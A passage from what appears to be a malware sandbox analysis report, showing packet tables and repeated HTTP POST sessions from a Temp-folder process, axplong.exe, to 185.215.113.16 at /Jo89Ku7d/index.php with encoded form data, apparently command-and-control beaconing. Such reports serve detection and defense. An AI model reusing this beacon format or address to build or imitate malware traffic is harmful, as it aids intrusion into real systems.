                    Sep 27, 2024 03:07:58.942688942 CEST5667980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:58.943094969 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.126338959 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:59.126472950 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.126724005 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.129208088 CEST8056679185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:59.129266977 CEST5667980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.131829023 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:59.853976965 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:59.854069948 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.854847908 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:59.861402988 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.089365959 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.089521885 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.192763090 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.193075895 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.198796034 CEST8056680185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.198910952 CEST5668080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.199145079 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.199222088 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.199563026 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.204576969 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.897063971 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:00.897130013 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.900763035 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:00.905553102 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.124598026 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.124664068 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.239494085 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.239845037 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.244633913 CEST8056682185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.244714022 CEST5668280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.245031118 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.245234013 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.245424032 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.250955105 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.952981949 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:01.955821037 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.956552982 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:01.961323023 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.186938047 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.187047005 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.302267075 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.302575111 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307516098 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.307537079 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.307666063 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307739973 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307837009 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.312580109 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.035101891 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.035249949 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.056969881 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.061913013 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.283761978 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.283879995 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.413615942 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.413986921 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.418869972 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.418955088 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.419090986 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.419506073 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.419564962 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.424348116 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.127178907 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.127247095 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.130686998 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.131156921 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.135885000 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.135960102 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.136367083 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.136487007 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.136584997 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.141526937 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.043207884 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.043282986 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.148562908 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.148853064 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.154048920 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.154066086 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.154160023 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.154171944 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.156019926 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.160867929 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.853718042 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.854988098 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.909229994 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.913491011 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.915788889 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.916101933 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.919895887 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.920171022 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.921688080 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.927639008 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.695524931 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.695760965 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.804389000 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.804588079 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809396029 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.809510946 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.809602976 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809672117 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809837103 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.814640999 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.508126974 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.508198023 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.514189959 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.521642923 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.740587950 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.743762016 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.885380983 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.885734081 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016164064 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.016232967 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016239882 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.016321898 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016844988 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.021625042 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.741755962 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.742222071 CEST5669080192.168.2.6185.215.113.16

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Sep 27, 2024 03:06:21.885983944 CEST53493631.1.1.1192.168.2.6
                    Sep 27, 2024 03:06:48.574023962 CEST5358522162.159.36.2192.168.2.6
                    Sep 27, 2024 03:06:49.067341089 CEST53617931.1.1.1192.168.2.6

                    HTTP Request Dependency Graph

                    • 185.215.113.16

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.656623185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:02.607655048 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:03.316940069 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:03.331706047 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:03.554655075 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.656624185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:03.667393923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:04.358390093 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:04.359389067 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:04.581516981 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.656625185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:04.699923992 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:05.412720919 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:05.413649082 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:05.823570013 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.656627185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:05.948107958 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:06.646378040 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:06.647269964 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:06.869190931 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.656628185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:06.995167017 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:07.692848921 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:07.693691015 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:07.919451952 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.656629185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:08.026561022 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:08.732630968 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:08.733555079 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:08.964117050 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.656630185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:09.073431969 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:09.772164106 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:09.802272081 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:10.029757977 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.656631185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:10.152601957 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:10.842747927 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:10.843728065 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
